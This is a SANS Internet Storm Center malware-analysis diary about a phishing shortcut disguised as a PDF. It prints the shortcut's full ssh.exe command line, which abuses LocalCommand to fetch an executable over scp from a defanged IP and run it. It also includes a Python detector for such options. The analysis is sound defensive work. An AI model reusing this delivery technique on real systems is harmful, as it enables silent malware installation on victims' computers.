Christmas is at our doors and attackers use the holiday season to deliver more and more gifts into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer, but the technique used here is interesting.
Microsoft added SSH support to Windows a while ago. I remember the first time I typed “ssh” into a command line and did not get the wonderful message:
‘ssh’ is not recognized as an internal or external command
Because ssh is available on many computers today, attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:
remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk
ExifTool Version Number : 12.76
File Name : christmas_slab.pdf.lnk
Directory : .
File Size : 1992 bytes
File Modification Date/Time : 2024:12:20 05:39:50-05:00
File Access Date/Time : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time : 2024:12:20 05:39:50-05:00
File Permissions : -rwx------
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes : Archive
Create Date : 2024:10:09 05:37:10-04:00
Access Date : 2024:11:05 07:47:23-05:00
Modify Date : 2024:10:09 05:37:10-04:00
Target File Size : 1243648
Icon Index : (none)
Run Window : Normal
Hot Key : (none)
Target File DOS Name : ssh.exe
Drive Type : Fixed Disk
Drive Serial Number : 280C-1822
Volume Label :
Local Base Path : C:\Windows\System32\OpenSSH\ssh.exe
Relative Path : ..\..\..\Windows\System32\OpenSSH\ssh.exe
Working Directory : C:\Program Files (x86)\Microsoft\Edge\Application
Command Line Arguments : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17[.]43[.]12[.]31
Machine ID : christmas-destr
This LNK file will spawn ssh.exe, which will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retrieve the file.
Something else suspicious: the IP belongs to Apple:
NetRange: 17.0.0.0 – 17.255.255.255
CIDR: 17.0.0.0/8
NetName: APPLE-WWNET
NetHandle: NET-17-0-0-0-1
Parent: ()
NetType: Direct Allocation
OriginAS:
Organization: Apple Inc. (APPLEC-1-Z)
RegDate: 1990-04-16
Updated: 2023-11-15
Comment: Geofeed https://ip-geolocation.apple.com
Ref: https://rdap.arin.net/registry/ip/17.0.0.0
I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!
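A triage check for shortcuts shaped like the one in the exiftool output above, as an added example that is not the author's hunting rule: it reads the string fields of a .lnk and reports the ssh options used here. The function names, the constructed sample and its 192.0.2.10 address are assumptions made for the illustration.

```python
import re
import struct

# LinkFlags bits that decide which optional sections follow the 76-byte header.
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon"))
SUSPICIOUS = {  # the ssh options seen in the shortcut above
    "PermitLocalCommand": r"permitlocalcommand\s*[= ]\s*yes",
    "LocalCommand": r"(?<!permit)localcommand\s*[= ]",
    "StrictHostKeyChecking": r"stricthostkeychecking\s*[= ]\s*no",
}

def lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, ...) of a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:    # IDListSize does not count its own two bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize counts its own four bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    out = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            size = struct.unpack_from("<H", data, pos)[0] * width  # count is in chars
            out[name] = data[pos + 2:pos + 2 + size].decode(codec, "replace")
            pos += 2 + size
    return out

def ssh_lnk_findings(data: bytes) -> list:
    """Names of the risky ssh options in a shortcut that targets an OpenSSH client."""
    fields = lnk_strings(data)
    # Assumption: the target is read from the relative path only, as in this sample.
    if not fields.get("relative_path", "").lower().endswith(
            ("ssh.exe", "scp.exe", "sftp.exe")):
        return []
    args = fields.get("arguments", "")
    return [n for n, rx in SUSPICIOUS.items() if re.search(rx, args, re.I)]

def build_sample(rel=r"..\..\..\Windows\System32\OpenSSH\ssh.exe",
                 args='-o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" '
                      '-o "LocalCommand=echo constructed" user@192.0.2.10') -> bytes:
    """Constructed minimal .lnk for testing (not the sample from the diary)."""
    header = struct.pack("<I16sI", 0x4C, bytes(16), 0x08 | 0x20 | IS_UNICODE) + bytes(52)
    return header + b"".join(struct.pack("<H", len(t)) + t.encode("utf-16-le")
                             for t in (rel, args))
```

Run ssh_lnk_findings() over the bytes of each .lnk collected from mail attachments or user profiles; any non-empty result deserves a closer look.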
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.